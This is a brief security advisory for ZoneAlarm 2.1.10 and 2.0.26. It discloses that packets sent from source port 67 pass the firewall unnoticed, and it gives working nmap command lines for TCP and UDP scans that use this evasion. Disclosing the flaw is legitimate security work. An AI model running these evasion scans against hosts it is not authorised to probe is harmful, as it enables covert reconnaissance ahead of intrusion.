Vulnerable systems:
ZoneAlarm version 2.1.10
ZoneAlarm version 2.0.26

If one uses port 67 as the source port of a TCP or UDP scan, ZoneAlarm will let the
packet through and will not notify the user. This means, that one can TCP or UDP port
scan a ZoneAlarm protected computer as if there were no firewall there IF one uses port
67 as the source port on the packets.

Exploit:
UDP Scan:
You can use NMap to port scan the host with the following command line:
nmap -g67 -P0 -p130-140 -sU 192.168.128.88 
(Notice the -g67 which specifies source port).

TCP Scan:
You can use NMap to port scan the host with the following command line:
nmap -g67 -P0 -p130-140 -sS 192.168.128.88 
(Notice the -g67 which specifies source port).

Provided by : Wally Whacker - mailto:whacker@HACKERWHACKER.COM